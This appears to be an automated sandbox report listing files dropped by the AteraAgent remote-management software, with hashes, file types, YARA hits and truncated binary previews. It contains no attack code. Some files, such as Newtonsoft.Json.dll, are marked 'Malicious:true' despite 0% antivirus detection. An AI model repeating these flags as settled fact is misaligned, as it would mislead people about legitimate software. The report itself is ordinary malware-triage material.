                                                                                                                                                                                                                                                                                                                                  SHA1:86A078E94B5578EC4125F50F78C8518A8CE1D086
                                                                                                                                                                                                                                                                                                                                  SHA-256:C6F05B647DBADC15AB97D31790FC8ACE054986EC33E9178FEEAD4235AD15CB0D
                                                                                                                                                                                                                                                                                                                                  SHA-512:FAB5FE82873862CE8ED1A427482093CCA307F6663E9F6497FDC244CE461312872D419FF274CDCA0C496414C28681901F335C9911B95D2A7C112D30E32D74E498
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ...............................C....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):704560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.954116173285503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:i9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc33:i8m657w6ZBLmkitKqBCjC0PDgM5H
                                                                                                                                                                                                                                                                                                                                  MD5:BA66874C510645C1FB5FE74F85B32E98
                                                                                                                                                                                                                                                                                                                                  SHA1:E33C7E6991A25CC40D9E0DCC260B5A27F4A34E6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:12D64550CB536A067D8AFFF42864836F6D41566E18F46D3CA92CB68726BDD4E9
                                                                                                                                                                                                                                                                                                                                  SHA-512:44E8CAA916AB98DA36AF02B84AC944FBF0A65C80B0ADBDC1A087F8ED3EFF71C750FB6116F2C12034F9F9B429D6915DB8F88511B79507CC4D063BAB40C4EAA568
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ...............................E....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\dynamicfieldscaching.cch

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.671387678423969
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:hsShKC+4MsShLP6SX9NfzyShaKf0ObqGShaKf0Od:M4qBX9Nf1bqd
                                                                                                                                                                                                                                                                                                                                  MD5:ABCB0010BD0D139870A8EB21E8B60A20
                                                                                                                                                                                                                                                                                                                                  SHA1:0FB88A133971993161C603C22ECB294EC35EA518
                                                                                                                                                                                                                                                                                                                                  SHA-256:6458C438D9A7215D48AEB2BA71815A9C9A40D117B6F3700A4841264D9D3FAC07
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B04E2FE6CCB5A29D4179B5F46BAFAFD66FF4D222FDDFD0E8A703EC44C81F63AE0BBCD0835A35A833D8B32716EFA834B0E17122E64C81A279945CA8CC06AC2FC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................TAgentPackageAgentInformation, Version=37.9.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]..............1..|2..H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\information.cch

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.728724445269141
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:nZqoWEeNyn:nZZWEeNy
                                                                                                                                                                                                                                                                                                                                  MD5:D80474EEB8DF2DDF337F1BD192FB82CF
                                                                                                                                                                                                                                                                                                                                  SHA1:272F8F9517096DA15581A4C6BD35DF253C3704CB
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C1A1190A33884123DE7948D1918C9BA72588DD892D13B6CAA7BF8074EF00A90
                                                                                                                                                                                                                                                                                                                                  SHA-512:C699DAAD0AF01E5D9A55A20B47C4692580E8D61471DE6ED6FB338577EFE8A0824EA31664F7D690A2787760E726BD3232582892416B0AF7685F3643E9C19CC923
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.0ADCBE65552FBD12321A260A6105EFDA

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\update.cch

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.677028119136097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:fc3Gh7UgzVchXn:f7NUgWn
                                                                                                                                                                                                                                                                                                                                  MD5:E49A5284D2F384905389D53944708C48
                                                                                                                                                                                                                                                                                                                                  SHA1:E455420E95EA0246B8B63A251B0E451ACD711B28
                                                                                                                                                                                                                                                                                                                                  SHA-256:33FD3B161AEC8867652C6B0707180ADC42C267EE9F66E33BF0CE70B55B4660B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9EC60296F38F68EB6C6233094E50EF534CE44A91E6511097158D631673017F8FE316E1C11A494C29BD8BE6F94AAFBF9F4A9546E709694BD3CC98B12CD243FF4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.2E69DDAE9D0D04A8ED39EECA359A9772

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):328916
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999290842463468
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN/Hggh:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdv5
                                                                                                                                                                                                                                                                                                                                  MD5:D3901E62166E9C42864FE3062CB4D8D5
                                                                                                                                                                                                                                                                                                                                  SHA1:C9C19EEC0FA04514F2F8B20F075D8F31B78BAE70
                                                                                                                                                                                                                                                                                                                                  SHA-256:DBC0E52E6DE93A0567A61C7B1E86DAA51FBEF725A4A31EEF4C9BBFF86F43671C
                                                                                                                                                                                                                                                                                                                                  SHA-512:AE33E57759E573773B9BB79944B09251F0DC4E07CDB8F373EC06963ABFC1E6A6326DF7F3B5FECF90BD2B060E3CB5A48B913B745CC853AC32D2558A8651C76111
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....'gqX............/...AgentPackageHeartbeat/AgentPackageHeartbeat.exe....0l.......?........F0..6\.q.......<.......I.3. &.;.........O.;d.&.U....".' ..}P..u+0.`g.Z..Zq,...w.1./..UD....F.a...B=.....!.. .=... .#7A.Q..o.........+q.C5 . 1..Ud...R>n..Y.9}>z.....yE7.}!sn....p1(e.....}T#>2/..y*7.@.<..J..q......3.4....M..."/"..cS....9pT.dn.:c...&..,H.e.....r...X#...m...V..ZP......+.h.R. .8.......!7FNa.`.P;.......P~..U.x.K.D8.&.vQ!..xn..~cNG.2._L.},..........:.J...S.y..-J...K.z.H.....z.G.6....d.b.[..9......Q.r.T........#..+..b6<...p.}......!.5.&l.E..4.F8..Y...."/.b.....................(.......b..&.6...t..%.(A..X{....H4....[.....}.......n0.:.......s..wQ.&.J\|j.....7=b+.L.t.l.0.{G.Jb.Jy.U.kG.....p-...^..g.4..RA.R..........~..5t4_...Z...h..J..........t...C3....{K.h...F..W$...U....-55....Hi.......m...............x..........)...F.p....r,}}L...i:q.Y.O....`L......yY...N..J]....T..~_|.Bh..p.w%0.H.%D...p..RM`..e....TJk..(..\.%......4..N.<..^..k/_..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                                                                                                                  MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                                                                                                                  SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                                                                                                                  SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                                                                                                                  SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............"...0..8...........V... ...`....@.. ....................................`..................................V..O....`..P............D..0(...........U..8............................................ ............... ..H............text....6... ...8.................. ..`.rsrc...P....`.......:..............@..@.reloc...............B..............@..B.................V......H.......t-..x(......2.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.rW..p*.r...p*F.(....r...p( ...*.r...p*.r...p*..(....*.rM..p*.r...p

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):542
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                                                                                                                  SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                                                                                                                  MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                                                                                                                  SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=17.14

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                                                                                                                  MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                                                                                                                  SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                                                                                                                  SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                                                                                                                  SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ...............................F....`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960415778826794
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUs:fBA/ZTvQD0XY0AJBSjRlXP36RMGx
                                                                                                                                                                                                                                                                                                                                  MD5:3DDA2732842FCAEEA0477F18D85CB584
                                                                                                                                                                                                                                                                                                                                  SHA1:D70016DF3F407CFE1BE6ACF63CC80A2B40F8212B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF3F8313AD94CFB9C2E8C95B54433F112918A0542C341763B19C0B2C6914A71D
                                                                                                                                                                                                                                                                                                                                  SHA-512:3403842EA1DF9F314EFF6E78F36F215A4E371B01B1C83345B7745737FABB092BDCFE63F78A29FB5FAD14825DA1C7AC286CC8BCA02B0FC3056620FE268D4FE6F9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......Ee....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):833993
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                                                                                                                  MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                                                                                                                  SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                                                                                                                  SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....;9rX.9..........9...AgentPackageInternalPoller/AgentPackageInternalPoller.exe....0Z.......U........ee..Th8.............t.v.g....g......M.........c..K.`|.'1.W.g.;.W+.e.....D.."|...]-:.To.:.`B(.E{.T.?..z...&.....g.....1.,km8.....Y......WZm;..!.....k.....iA...~.zK..EW'.....p.A....Q6.~S......A.......6....h=C3N0y.$i....M...N....C......I.....UCp.p....x..WQ!.p..>.'N%.2Z.l.R8./...%Ew..T..yy.....q...U.nqH......".......n.6M..P.:t...t1..r...!9Z.N.X.s8.3.9V.a...m8....LpWS..O.8..R6..O.l....e|(..F...Og.h.0..,..Z.H....Rl..L.N.9.\...."4..%..A.<."..Iy...:..GBw_1......3.y.p...a...*...l..._.FI.Z.....+.L.....]Y.K|RM.Pf..in.........93+2.QMH.t......<...3.. ....2..!....t..)).I\.qw1.'..J...J3".K'rt.h.f+.I.7...q.MK......V.._!Q.].w..au.[.brv.T&..Lfm./..J.$.m...... t.u..uQ...L...\...M.Ihp.rG.J..C".....d.....;z..d....L.p.r.c7....q[2.e.........!(....Ld.....M..9...M....>EN&dY.]....>QUJ..N.+d.cr..].D.o.........?o.~@....@..D[...5.C.eP.a.....;..:.._v.....R

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):219696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                                                                                                                  MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                                                                  SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                                                                                                                  SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                                                                                                                  SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..e.........."...0..&..........:D... ...`....@.. ..............................h)....`..................................C..O....`..d............2..0(...........B............................................... ............... ..H............text....$... ...&.................. ..`.rsrc...d....`.......(..............@..@.reloc...............0..............@..B.................D......H........@..$.......f.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ...x )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{ ...*..{!...*r.(......}......} .....}!...*..0..Y........u........L.,G(.....{.....{....o....,/(.....{ ....{ ...o....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):541
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
